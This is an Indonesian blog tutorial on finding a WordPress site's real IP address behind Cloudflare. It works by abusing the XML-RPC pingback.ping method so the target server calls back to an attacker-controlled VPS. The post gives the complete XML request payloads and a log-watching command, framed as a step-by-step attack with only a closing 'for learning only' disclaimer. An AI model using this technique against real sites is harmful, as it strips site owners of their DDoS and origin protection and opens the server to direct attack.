Mendapatkan IP Asli Dibalik Cloudflare Memanfaatkan XML-RPC Pingback WordPress

Mendapatkan IP Asli Dibalik Cloudflare Memanfaatkan XML-RPC Pingback WordPress - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul Mendapatkan IP Asli Dibalik Cloudflare Memanfaatkan XML-RPC Pingback WordPress, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.

Mendapatkan IP Asli Dibalik Cloudflare Memanfaatkan XML-RPC Pingback. Ada banyak cara yang bisa dilakukan untuk menemukan IP dibalik Cloudflare. Yang paling lazim digunakan adalah menggunakan DNS history. Namun jika website tersebut memiliki fungsi Pingback XMLRPC, misalnya WordPress, kita bisa memanfaatkan service tersebut untuk mengetahui IP dibalik Cloudflare.

Sebelum memulai tutorial ini, pastikan kalian juga memiliki satu buah VPS atau server yang sudah terinstall webserver.

Pertama, kita cek A record dari web target.

Terlihat dari screenshot diatas bahwa web tersebut menggunakan Cloudflare.

Oke, selanjutnya kita cek apakah website tersebut memiliki fungsi ping di XMLRPCnya. Di WordPress, kalian bisa melakukan post request ke file xmlrpc.php

Berikut request yang dikirim untuk melihat seluruh method yang bisa digunakan.

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Jika method pingback.ping tersedia, kita bisa lanjut.

Selanjutnya kita login ke server kita, dan pantau access log ke web server.

Contoh

tail -f /var/log/nginx/access.log | grep cloudflare_bypass

Selanjutnya kita balik lagi ke web target. Buat request dengan method pingback.ping. Formatnya adalah

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>
<string>http://ip_server_kita/cloudflare_bypass</string>
</value>
</param>
<param>
<value>
<string>http://webtarget.com/postingan-artikel/</string>
</value>
</param>
</params>
</methodCall>

Jadi di web target harus ada artikel valid yang bisa kita gunakan untuk melakukan pingback. Untuk IP server kita, maksudnya adalah IP server VPS yang kita miliki. Pastikan juga web servernya sudah diaktifkan sehingga kita bisa cek log akses nya.

Contoh request dan respon nya di Burp Suite.

Dan di log access VPS kita, yang tercatat adalah IP asli web target, bukan lagi IP Cloudflare.

Selesai.

Sebenarnya kita juga bisa melakukan request ke file xmlrpc.php menggunakan curl. Namun di tutorial ini saya gunakan Burp Suite agar lebih jelas.

Oke mungkin itu saja tutorial kali ini, jika ada yang kurang jelas silahkan tinggalkan komentar.

Sumber http://noob1t4.blogspot.com/

Sekian Artikel Mendapatkan IP Asli Dibalik Cloudflare Memanfaatkan XML-RPC Pingback WordPress.

Terima kasih telah membaca artikel Mendapatkan IP Asli Dibalik Cloudflare Memanfaatkan XML-RPC Pingback WordPress, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.

Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini

Share this post